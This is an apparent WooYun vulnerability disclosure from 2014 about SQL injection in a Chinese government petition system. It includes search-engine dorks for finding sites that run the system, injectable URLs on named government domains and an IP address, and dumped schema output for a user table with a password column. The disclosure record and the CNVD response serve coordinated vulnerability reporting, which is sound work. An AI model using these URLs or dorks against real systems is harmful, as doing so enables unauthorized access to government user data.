漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-09-03: 厂商已经确认,细节仅向厂商公开
2014-09-06: 细节向第三方安全合作伙伴开放
2014-10-28: 细节向核心白帽子及相关领域专家公开
2014-11-07: 细节向普通白帽子公开
2014-11-17: 细节向实习白帽子公开
2014-11-27: 细节向公众公开
简要描述:
无技术含量各位低调不用在意
详细说明:
注:第一处重复
搜索
http://music.google.cn/search?q=inurl:policylaw/policylaw.do&newwindow=1&filter=0
http://music.google.cn/search?q=inurl:index/index.do%3Fact%3Dindex&newwindow=1&filter=0
之前有人提交文件下载
WooYun: 某政府通用系统任意文件下载漏洞
杭州中软安人网络通信有限公司设计维护
漏洞证明:
SQL1
http://www.hzxf12345.gov.cn/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015
Table: WEB_USERINFO
[11 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ID | NUMBER |
| MAXQUANTUM | NUMBER |
| MEMO | VARCHAR2 |
| QUANTUM | NUMBER |
| ROLE | VARCHAR2 |
| TELEPHONE | VARCHAR2 |
| UNIT_ID | NUMBER |
| USERID | VARCHAR2 |
| USERNAME | VARCHAR2 |
| USERPSW | VARCHAR2 |
| USERTYPE | CHAR |
+------------+----------+
http://qzxx.kq.gov.cn/sxwsxf/appellate/appellate.do?act=read&jlbh=%A8%AA?0113201405300015
http://122.224.136.141:3465/scwsxf/appellate/appellate.do?act=read&jlbh=%CD%F8A0010201404140001'
SQL2
http://www.hzxf12345.gov.cn/work/rmjyzj.do?act=qtlist&flag=1
修复方案:
过滤了
版权声明:转载请注明来源 wefgod@乌云
>
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-09-03 09:46
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给浙江分中心,由其后续协调案例用户单位,同时CNVD将尝试联系软件生产厂商——杭州中软人安(无联系电话),后续直接通过公开邮件通报。
最新状态:
暂无